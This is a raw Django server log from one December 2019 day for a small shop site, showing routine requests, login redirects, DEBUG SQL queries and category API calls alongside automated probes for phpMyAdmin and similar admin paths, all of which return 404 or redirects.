/php2MyAdmin/index.php [07/Dec/2019 00:41:31] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpiMyAdmin/index.php [07/Dec/2019 00:41:31] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpNyAdmin/index.php [07/Dec/2019 00:41:31] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /1/index.php [07/Dec/2019 00:41:32] "GET /1/index.php HTTP/1.0" 404 6626 Not Found: /download/index.php [07/Dec/2019 00:41:34] "GET /download/index.php HTTP/1.0" 404 6647 Not Found: /phpMyAdmin_111/index.php [07/Dec/2019 00:41:35] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6665 Not Found: /321/index.php [07/Dec/2019 00:41:38] "GET /321/index.php HTTP/1.0" 404 6632 Not Found: /123131/index.php [07/Dec/2019 00:41:38] "GET /123131/index.php HTTP/1.0" 404 6641 Not Found: /phpMyAdminn/index.php [07/Dec/2019 00:41:39] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdminhf/index.php [07/Dec/2019 00:41:39] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6659 Not Found: /sbb/index.php [07/Dec/2019 00:41:39] "GET /sbb/index.php HTTP/1.0" 404 6632 Not Found: /WWW/phpMyAdmin/index.php [07/Dec/2019 00:41:40] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmln/index.php [07/Dec/2019 00:41:42] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin_ai/index.php [07/Dec/2019 00:41:43] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6662 Not Found: /__phpMyAdmin/index.php [07/Dec/2019 00:41:44] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6659 Not Found: /shopdb/index.php [07/Dec/2019 00:41:46] "GET /shopdb/index.php HTTP/1.0" 404 6641 Not Found: /phppma/index.php [07/Dec/2019 00:41:46] "GET /phppma/index.php HTTP/1.0" 404 6641 Not Found: /phpmy/index.php [07/Dec/2019 00:41:47] "GET /phpmy/index.php HTTP/1.0" 404 6638 Not Found: /mysql/admin/index.php [07/Dec/2019 00:41:48] "GET /mysql/admin/index.php HTTP/1.0" 404 6656 Not Found: /mysql/sqlmanager/index.php [07/Dec/2019 00:41:50] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6671 Not Found: /mysql/mysqlmanager/index.php [07/Dec/2019 00:41:50] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6677 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [07/Dec/2019 00:41:51] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6770 Not Found: /sqladmin/index.php [07/Dec/2019 00:41:51] "GET /sqladmin/index.php HTTP/1.0" 404 6647 Not Found: /SQL/index.php [07/Dec/2019 00:41:54] "GET /SQL/index.php HTTP/1.0" 404 6632 Not Found: /websql/index.php [07/Dec/2019 00:41:55] "GET /websql/index.php HTTP/1.0" 404 6641 Not Found: /MySQLAdmin/index.php [07/Dec/2019 00:41:55] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6653 Not Found: /manager/html [07/Dec/2019 00:41:56] "GET /manager/html HTTP/1.0" 404 6629 [07/Dec/2019 00:43:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:48:51] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:53:54] "GET / HTTP/1.0" 302 0 [07/Dec/2019 00:58:56] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:08:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 01:08:35,923 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy' LIMIT 1; args=('cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy',) DEBUG 2019-12-07 01:08:35,925 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T01:08:35.923869+00:00'::timestamptz); args=('cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 1, 8, 35, 923869, tzinfo=)) [07/Dec/2019 01:08:35] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 01:08:36] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [07/Dec/2019 01:08:36] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [07/Dec/2019 01:08:36] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [07/Dec/2019 01:08:36] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [07/Dec/2019 01:08:36] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [07/Dec/2019 01:08:36] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 Not Found: /favicon.ico [07/Dec/2019 01:08:36] "GET /favicon.ico HTTP/1.0" 404 6627 [07/Dec/2019 01:12:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 01:13:07,211 utils 32196 139885071562496 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T01:13:07.201686+00:00'::timestamptz AND "django_session"."session_key" = 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy'); args=(datetime.datetime(2019, 12, 7, 1, 13, 7, 201686, tzinfo=), 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy') DEBUG 2019-12-07 01:13:07,252 utils 32196 139885071562496 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-21T01:13:07.250388+00:00'::timestamptz WHERE "django_session"."session_key" = 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 1, 13, 7, 250388, tzinfo=), 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy') [07/Dec/2019 01:13:07] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 01:18:01] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:23:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:28:06] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:34:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:39:36] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:44:58] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:50:01] "GET / HTTP/1.0" 302 0 [07/Dec/2019 01:55:14] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:14:18] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:19:20] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:24:23] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:29:26] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:42:44] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:48:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:53:54] "GET / HTTP/1.0" 302 0 [07/Dec/2019 02:59:12] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:04:13] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:09:17] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 03:14:20] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:22:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:25:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 03:25:19,392 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zn0fxhsmebotbv7r1c2xr5gwzipr1ygm' LIMIT 1; args=('zn0fxhsmebotbv7r1c2xr5gwzipr1ygm',) DEBUG 2019-12-07 03:25:19,394 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zn0fxhsmebotbv7r1c2xr5gwzipr1ygm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T03:25:19.392632+00:00'::timestamptz); args=('zn0fxhsmebotbv7r1c2xr5gwzipr1ygm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 3, 25, 19, 392632, tzinfo=)) [07/Dec/2019 03:25:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 03:29:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:42:39] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:45:56] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:47:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 03:52:44] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:00:01] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:05:04] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:10:07] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:15:10] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:20:12] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:25:46] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:30:49] "GET / HTTP/1.0" 302 0 Not Found: /image.php [07/Dec/2019 04:33:26] "GET /image.php HTTP/1.0" 404 6620 [07/Dec/2019 04:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:47:43] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:52:45] "GET / HTTP/1.0" 302 0 [07/Dec/2019 04:57:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:06:19] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:11:21] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 05:16:24] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:23:19] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:28:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 05:28:16,041 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'h1gfou1ksyo0a5hbrorn1kwt28zt98g5' LIMIT 1; args=('h1gfou1ksyo0a5hbrorn1kwt28zt98g5',) DEBUG 2019-12-07 05:28:16,044 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('h1gfou1ksyo0a5hbrorn1kwt28zt98g5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T05:28:16.042622+00:00'::timestamptz); args=('h1gfou1ksyo0a5hbrorn1kwt28zt98g5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 5, 28, 16, 42622, tzinfo=)) [07/Dec/2019 05:28:16] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 05:32:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:32:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 05:32:43,848 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ejsysxctf5fjn8gymwbeawxlrk3lmibj' LIMIT 1; args=('ejsysxctf5fjn8gymwbeawxlrk3lmibj',) DEBUG 2019-12-07 05:32:43,851 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ejsysxctf5fjn8gymwbeawxlrk3lmibj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T05:32:43.849452+00:00'::timestamptz); args=('ejsysxctf5fjn8gymwbeawxlrk3lmibj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 5, 32, 43, 849452, tzinfo=)) [07/Dec/2019 05:32:43] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [07/Dec/2019 05:36:54] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [07/Dec/2019 05:37:27] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=102 HTTP/1.0" 404 6705 Not Found: /newslist.asp [07/Dec/2019 05:37:36] "GET /newslist.asp?type=4&id=1286 HTTP/1.0" 404 6649 [07/Dec/2019 05:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:40:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /proxy.php [07/Dec/2019 05:46:27] "GET /proxy.php HTTP/1.0" 404 6629 [07/Dec/2019 05:47:17] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:52:20] "GET / HTTP/1.0" 302 0 [07/Dec/2019 05:57:22] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 06:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:12:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 06:12:16,685 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'w35ohuas1al5juo5ar6d83bmj60w0s9n' LIMIT 1; args=('w35ohuas1al5juo5ar6d83bmj60w0s9n',) DEBUG 2019-12-07 06:12:16,687 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('w35ohuas1al5juo5ar6d83bmj60w0s9n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T06:12:16.686342+00:00'::timestamptz); args=('w35ohuas1al5juo5ar6d83bmj60w0s9n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 6, 12, 16, 686342, tzinfo=)) [07/Dec/2019 06:12:16] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 06:12:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 06:12:17,052 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'joho36k3hsg212g7616kr7likz3rb22q' LIMIT 1; args=('joho36k3hsg212g7616kr7likz3rb22q',) DEBUG 2019-12-07 06:12:17,054 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('joho36k3hsg212g7616kr7likz3rb22q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T06:12:17.053433+00:00'::timestamptz); args=('joho36k3hsg212g7616kr7likz3rb22q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 6, 12, 17, 53433, tzinfo=)) [07/Dec/2019 06:12:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 06:12:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 06:12:17,473 utils 32196 139885071562496 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3bogni8ha8u5khd5wu3almmity78lhb1' LIMIT 1; args=('3bogni8ha8u5khd5wu3almmity78lhb1',) DEBUG 2019-12-07 06:12:17,474 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3bogni8ha8u5khd5wu3almmity78lhb1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T06:12:17.473863+00:00'::timestamptz); args=('3bogni8ha8u5khd5wu3almmity78lhb1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 6, 12, 17, 473863, tzinfo=)) [07/Dec/2019 06:12:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 06:12:19] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:17:56] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:26:55] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:31:59] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:43:38] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:48:56] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:53:59] "GET / HTTP/1.0" 302 0 [07/Dec/2019 06:59:33] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [07/Dec/2019 07:09:01] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [07/Dec/2019 07:09:02] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [07/Dec/2019 07:09:06] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [07/Dec/2019 07:09:06] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [07/Dec/2019 07:09:07] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [07/Dec/2019 07:09:07] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [07/Dec/2019 07:09:08] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [07/Dec/2019 07:09:09] "GET /index.php HTTP/1.0" 404 6620 [07/Dec/2019 07:09:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 07:09:11,222 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gcbg81gyh5tufq1cb12xv3w8cx94anwq' LIMIT 1; args=('gcbg81gyh5tufq1cb12xv3w8cx94anwq',) DEBUG 2019-12-07 07:09:11,224 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gcbg81gyh5tufq1cb12xv3w8cx94anwq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T07:09:11.223197+00:00'::timestamptz); args=('gcbg81gyh5tufq1cb12xv3w8cx94anwq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 7, 9, 11, 223197, tzinfo=)) [07/Dec/2019 07:09:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 07:10:06] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:11:32] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:15:06] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:20:09] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:25:13] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:30:15] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:37:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 07:41:27,975 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:41:27,984 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 07:41:27,986 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:41:27] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 07:42:30,671 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:42:30,675 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 07:42:30,677 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:42:30] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 07:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 07:47:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 07:48:07,879 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:48:07,885 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 07:48:07,888 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:48:07] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 07:48:50,658 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:48:50,662 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 07:48:50,664 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:48:50] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 07:49:29,473 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:49:29,482 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 07:49:29,486 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:49:29] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 07:49:45,610 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:49:45,618 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 07:49:45,622 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:49:45] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 07:50:02,777 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:50:02,782 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) 